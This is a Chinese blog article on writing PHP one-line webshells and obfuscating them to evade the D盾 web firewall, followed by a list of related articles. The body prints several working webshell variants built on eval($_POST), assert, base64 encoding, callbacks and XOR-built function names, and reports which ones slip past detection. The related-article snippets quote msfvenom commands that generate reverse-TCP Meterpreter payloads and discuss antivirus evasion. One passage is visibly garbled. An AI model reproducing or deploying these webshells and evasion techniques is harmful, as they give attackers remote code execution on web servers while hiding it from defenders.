一句话木马以及免杀

article/2025/9/24 2:20:13

此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言
WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础
查杀软件我首先:D盾
『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了常见的入侵方法,让服务器更安全
由于php7.1以后assert不能拆分了,所以此篇不使用assert函数作为核心,使用适用性更广的eval
在这里我们用最新版D盾进行查杀
在这里插入图片描述

首先请出我们最爱的一句话木马:

<?php @eval($_POST['1']);?>

无论如何混淆webshell,我们期望最终得到的逻辑依然是这条代码,所以答案知道了,想办法混淆就行了。
我们先看下这个的查杀吧
在这里插入图片描述
显然被杀了
经过对D盾的探测,可以知道,它对函数的检测其实是比较粗糙的,比如我们构造一个函数,让其返回值拼接为

<?phpfunction x()
{return $_POST['1'];}eval(x());
?>

在这里插入图片描述
虽然没被直接杀掉但是级别也换成了2级
首先,无论如何更改函数名,都会被杀掉,所以和函数名没关系,然后就是eval内的参数了,测试后发现,只要拼接成eval($_POST[‘a’])就会被杀,因此我们避免语句直接拼接为这样即可。

如何避免直接拼接呢 当然是往中间加料了 加一些既不会破坏语法又能起到隔离作用的东西,什么东西可以做到这样呢?当然就是注释了

<?phpfunction x()
{return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";}eval(x());
?>

在这里插入图片描述
可以看到已经完全绕过查杀了

既然如此,我们的核心绕过思路就是利用注释了,为了去除特征,必不可少的就是随机性了
使用函数返回值与eval拼接只是权宜之计,毕竟也是一条规则就能够被干掉的。所以我们这里使用类和构造函数来替代主动调用函数。

<?php
class x
{function __construct(){      @eval("/*sasas23123*/".$_POST['a']."/*sdfw3123*/");}}
new x();?>

在这里插入图片描述
尴尬了被查杀了这样也不行,看来eval是被重点关照的对象。
改到这里,我不禁想 如果D盾发狠把". P O S T [ ′ a ′ ] . " 当 独 立 规 则 , 那 岂 不 是 也 歇 菜 , 所 以 , 我 决 定 使 用 b a s e 64 编 码 将 " _POST['a']."当独立规则,那岂不是也歇菜,所以,我决定使用base64编码将" POST[a]."使base64"_POST[‘a’]"转化一下

<?php
class x
{public $payload = null;public $decode_payload = null;function __construct(){       $this->payload='ZXZhbCgkX1BPU1RbYV0pOw==';$this->decode_payload = @base64_decode( $this->payload );@eval("/*sasas23123*/".$this->decode_payload."/*sdfw3123*/");}}
new x();?>

在这里插入图片描述
可以看到杀到了二级也不行。
试试数组

<?php
$b = substr_replace("assexx","rt",4);
$a = array($arrayName = ($arrayName =($arrayName = array('a' => $b($_POST['x'])))));
?>

在这里插入图片描述
完美绕过
下面试试组合回调函数绕过

<?php function zeo($c,$d){pj()($c,$d);}function pj(){return "register_shut"."down_function";}$b=$_POST['x'];
zeo(assert,$b);
?>

在这里插入图片描述
完美绕过
看看无字符码
没有字母,简单来说就是字母被替代了

就是用各种运算,例如异或,拼装出来想要的函数

最后能构造出a-z中任意一个字符。

然后再利用PHP允许动态函数执行的特点,

<?php
@$_++;
$__ = ("`" ^ "?") . (":" ^ "}") . ("%" ^ "`") . ("{" ^ "/");
$___ = ("$" ^ "{") . ("~" ^ ".") . ("/" ^ "`") . ("-" ^ "~") . ("(" ^ "|");
${$__}[!$_](${$___}[$_]);
?>

在这里插入图片描述
看来这样也不行

看看字符串变换

<?php
$a = substr_replace("xxser","asser",-3);
$aa = array('',$a);
$b = $aa[1].chr('116');
$fun=preg_replace("/xx/","",$b);
$cc = substr_replace("",$fun,0);$cc($_POST['x']);
?>

在这里插入图片描述
可以看到二级也不太行
接着看下php7以下的版本
assert函数

<?php assert(@$_POST['a']); ?>

在这里插入图片描述
尴尬直接过了

<?php
func = $_GET["func"];
assert("$func()");
?>

在这里插入图片描述
GET方法不太行
这个是我总结的webshell免杀技巧,后期有更好的绕过免杀技术再和大家分享


http://chatgpt.dhexx.cn/article/V80Ifwke.shtml

相关文章

Python木马分离免杀(下载分离型)

渗透环境&#xff1a; 目标主机&#xff1a;win10-192.168.159.133-杀软360、火绒、微步云沙盒 攻击主机&#xff1a;kali-192.168.159.129 使用工具&#xff1a;msfconsole、pyinstaller、pycharm 木马制作过程&#xff1a; 1、msfconsole的msfvenom模块生成shellcode k…

关于木马免杀的一些方法

一、免杀简述 ​ 理论上讲&#xff0c;免杀⼀定是出现在杀毒软件之后的。⽽通过杀毒软件的发展史不难知 道&#xff0c;第⼀款杀毒软件 kill 1.0是Wish公司1987年推出的&#xff0c;也就是说免杀技术⾄少是在 1989年以后才发展起来的。 ​ 1989年&#xff1a;第⼀款杀毒软件M…

MSF木马的免杀(三)

目录 MSF木马的免杀 C/C加载免杀 加图标 MSF木马的免杀 MSF下输入下列命令&#xff0c;生成免杀shellcode msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOSTx.x.x.x LPORT8888 -e x86/shikata_ga_nai -i 15 -b \x00\ PrependMigratetrue Pre…

木马免杀平台

VirScan 《多引擎在线扫描平台》 访问&#xff1a;https://www.virscan.org/ VirusTotal 《威胁猎捕平台》 访问&#xff1a;https://www.virustotal.com/gui/home/upload Jotti 《恶意软件扫描系统》 访问&#xff1a;https://virusscan.jotti.org/ 腾讯哈勃分析系统 《文件…

绕过杀毒软件,免杀木马制作

绕过杀毒软件&#xff0c;免杀木马制作&#xff08;以AVG Anti Spyware杀毒软件为例&#xff09; 一、将Sever.exe打开&#xff0c;分块生成100个文件 二、使用AVG Anti Spyware查杀生成的文件&#xff0c;再二次处理&#xff0c;重复这个过程&#xff0c;直到缩小到很小的范围…

木马的伪装与免杀

0x01:我们依靠msf生成简单的shellcode免杀 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOSTXXX LPORTXXX -e x86/shikata_ga_nai -i 12 -b \x00\ PrependMigratetrue PrependMIgrateProxsvchost.exe -f c > /root/Desktop/shellcode.c 这里我们生成…

后渗透-木马免杀

木马免杀 0x00 免杀 木马免杀的方法有很多种&#xff0c;如反转、异或、远程加载、加壳等&#xff0c;这里举例反转加异或 0x01 利用msfvenom制作木马 sfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.12.135 LPORT5555 -f py > 2.py# -p 指定payload # LHO…

APT之木马静态免杀

前言 这篇文章主要是记录手动编写代码进行木马免杀&#xff0c;使用工具也可以免杀&#xff0c;只不过太脚本小子了&#xff0c;而且工具的特征也容易被杀软抓到&#xff0c;指不定哪天就用不了了&#xff0c;所以要学一下手动去免杀木马&#xff0c;也方便以后开发一个只属于…

【木马免杀】

文章目录 前言题目一.免杀需求&#xff0c;查杀技术&#xff0c;免杀技巧&#xff0c;免杀实战免杀需求查杀技术免杀技巧免杀实战webshell免杀&#xff1a;1.引用免杀2.可变变量3.二维数组4.数组交集5.回调函数6.编码 木马免杀&#xff1a;1.msf自带免杀2.msf捆绑免杀3.msf自带…

2021Kali -- 木马免杀制作

​知道为什么梦里的人都看不清脸么&#xff1f;因为怕你当真。。。 ---- 网易云热评 一、通过MSF生成shellcode 1、启动MSF&#xff0c;演示版本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b \x00 l…

msf生成免杀木马

一.杀软原理 免杀概念免杀&#xff0c;也就是反病毒&#xff08;AntiVirus&#xff09;与反间谍&#xff08;AntiSpyware&#xff09;的对立面&#xff0c;英文为Anti-AntiVirus&#xff08;简写Virus AV&#xff09;&#xff0c;逐字翻译为“反-反病毒”&#xff0c;翻译为“…

052 木马免杀全攻略

木马免杀全攻略 转载自&#xff1a;a1pass.blog.163.com 2007-12-07 14:02:24| 分类&#xff1a; 思绪燃星火——技 | 标签&#xff1a;黑客 杂志刊物 作者&#xff1a;A1Pass 出处&#xff1a;http://a1pass.blog.163.com/ 本文发表于07年第7期《黑客X档案》&#xff0c;与原…

渗透测试-木马免杀的几种方式

前言 免杀&#xff0c;又叫免杀毒技术&#xff0c;是反病毒&#xff0c;反间谍的对立面&#xff0c;是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外&#xff0c;还可以扩增病毒木马的功能&#xff0c;改变病毒木马的行为。免杀的基本特征是破坏…

木马免杀方式

前言 免杀&#xff0c;又叫免杀毒技术&#xff0c;是反病毒&#xff0c;反间谍的对立面&#xff0c;是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外&#xff0c;还可以扩增病毒木马的功能&#xff0c;改变病毒木马的行为。免杀的基本特征是破坏…

Kali渗透-MSF木马免杀技术

前言 免杀技术全称为反杀毒技术 Anti-Virus 简称“免杀”&#xff0c;它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广&#xff0c;其中包含反汇编、逆向工程、系统漏洞等技术&#xff0c;内容基本上都是修改病毒、木马的内容改变特征码&#…

C语言C++制作游戏外挂,一个简单的内存外挂!

通过 C 语言编写一个简单的外挂&#xff0c;通过 API 函数修改游戏数据&#xff0c;从而实现作弊功能 对象分析 要用的 API 函数简单介绍 编写测试效果 总体评价 下面是小编整理好的一套C/C资料&#xff0c;加小编C/C编程学习群825414254获取系统性学习C/C的学习资料 对象分析…

使用MisakaPatcher制作Galgame外挂汉化补丁

简介 这两天我看见一个galgame机翻工具 MisakaTranslator&#xff0c;它类似VNR&#xff0c;使用C#编写并且支持Hook和OCR&#xff08;图像识别&#xff09;两种方法提取文本。 我在MisakaTranslator的基础上进行了一些改动&#xff0c;去除了所有的机翻的功能&#xff0c;转…

利用python编程,制作自己的游戏“外挂”!

Python简介及应用领域 Python是一种解释型脚本语言&#xff0c;可以应用于以下领域&#xff1a; Web 和 Internet开发科学计算和统计人工智能教育桌面界面开发软件开发后端开发网络爬虫 今天以一个小游戏和一小段代码来告诉大家编程有多好玩。 编程用的好&#xff0c;不仅可…

外挂的艺术-单机游戏辅助工具-网络游戏外挂

外挂&#xff08;wi gu&#xff09; 又叫开挂、开外挂、辅助、第三方辅助软件&#xff0c;综合某些修改器的功能进行编程出的游戏修改器。一般指通过修改游戏数据而为玩家谋取利益的作弊程序或软件&#xff0c;即利用电脑技术针对一个或多个软件进行非原设操作&#xff0c;篡改…

一步步用python制作游戏外挂【转】

玩过电脑游戏的同学对于外挂肯定不陌生&#xff0c;但是你在用外挂的时候有没有想过如何做一个外挂呢&#xff1f;&#xff08;当然用外挂不是那么道义哈&#xff0c;呵呵&#xff09;&#xff0c;那我们就来看一下如何用python来制作一个外挂。。。。 我打开了4399小游戏网&am…